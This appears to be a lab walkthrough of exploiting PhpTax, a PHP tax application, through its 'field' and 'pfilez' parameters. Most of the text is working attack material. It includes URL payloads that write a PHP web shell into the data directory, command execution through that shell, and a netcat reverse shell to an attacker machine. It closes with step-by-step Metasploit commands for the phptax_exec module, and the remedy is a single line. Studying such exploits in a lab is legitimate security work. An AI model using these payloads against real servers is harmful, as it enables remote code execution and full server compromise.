PhpTax is free software to do your U.S. income taxes. Tested under Unix environment. The program generates .pdfs that can be printed and sent to the IRS.

http://sourceforge.net/projects/phptax/

An attacker might write to arbitrary files or inject arbitrary code into a file with this vulnerability. User tainted data is used when creating the file name that will be opened or when creating the string that will be written to the file. An attacker can try to write arbitrary PHP code in a PHP file allowing to fully compromise the server.

Field variable exploitation

https://www.exploit-db.com/exploits/25849

======================================

#index.php

#LINE 32: fwrite fwrite($zz, “$_GET[‘newvalue’]”);

#LINE 31: $zz = fopen(“./data/$field”, “w”);

#LINE 2: $field = $_GET[‘field’];

======================================

1. Access this page and modify the values as will

  • http://{$url}/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E
  • http://192.168.0.18:8080/phptax/index.php?field=rce.php&newvalue=<?php passthru($_GET[cmd]); ?>
  • http://192.168.0.18:8080/phptax/index.php?field=rce.php&newvalue=<?php system($_GET[cmd]); ?>
  • http://192.168.0.18:8080/phptax/index.php?field=rce.php&newvalue=<?php shell_exec($_GET[cmd]); ?>

2. Access the data directory to find the script

  • http://192.168.0.18:8080/phptax/data/

3. Locate and execute the script

  • http://192.168.0.18:8080/phptax/data/rce.php?cmd=id

4. Knowing that we can execute system commands, we could also run a reverse shell

  • http://192.168.0.18:8080/phptax/data/rce.php?cmd=nc%20-e%20/bin/bash%20192.168.0.13%204444
  • http://192.168.0.18:8080/phptax/data/rce.php?cmd=nc -e /bin/bash 192.168.0.13 4444

pfilez variable exploitation

https://www.exploit-db.com/exploits/21665

================================

drawimage.php, line 63:

include (“./files/$_GET[pfilez]”);

// makes a png image

$pfilef=str_replace(“.tob”,”.png”,$_GET[pfilez]);

$pfilep=str_replace(“.tob”,”.pdf”,$_GET[pfilez]);

Header(“Content-type: image/png”);

if ($_GET[pdf] == “”) Imagepng($image);

if ($_GET[pdf] == “make”) Imagepng($image,”./data/pdf/$pfilef”);

if ($_GET[pdf] == “make”) exec(“convert ./data/pdf/$pfilef ./data/pdf/$pfilep”);

================================

1. Access phptax home folder

  • http://192.168.0.18:8080/phptax/index.php

2. Open any existing report, as you can see the report has a pfilez variable filled

  • http://192.168.0.18:8080/phptax/index.php?pfilez=1040pg2.tob

3. Now we can inject the code to execute a reverse connection. (in this case I get the connection but immediately closes, so this is for demonstration only, may have to troubleshoot, but I’m lazy!!, we just need the proof of concept)

4. I even ran TCPDump to capture traffic

  • tcpdump -i wlan0 | grep 192.168.0.18

Note: We can also exploit drawimage.php, instead of index.php

Using Metasploit

1. Start Metasploit service and search for “phptax”

  • service postgresql start
  • msfdb init
  • msfconsole
  • search phptax

2. select the module and display the options

  • use exploit/multi/http/phptax_exec
  • show options

3. show and set the payload

  • show payloads
  • set payload cmd/unix/reverse
  • show options

4. Fill the options marked as “Required yes”

  • set RHOSTS 192.168.0.18:8080
  • set RPORT 8080 # in this case the app is using that port
  • set LHOST 192.168.0.13

5. (EXTRA) In this particular scenario, we need to spoof the user agent to mozilla4, as per the site configuration, this is not usually required.

  • set UserAgent Mozilla/4.0
  • show advanced

6. Now run the exploit

  • exploit

Note: I had to run it twice. The first time the session expired.

Remedy

Do some input validation.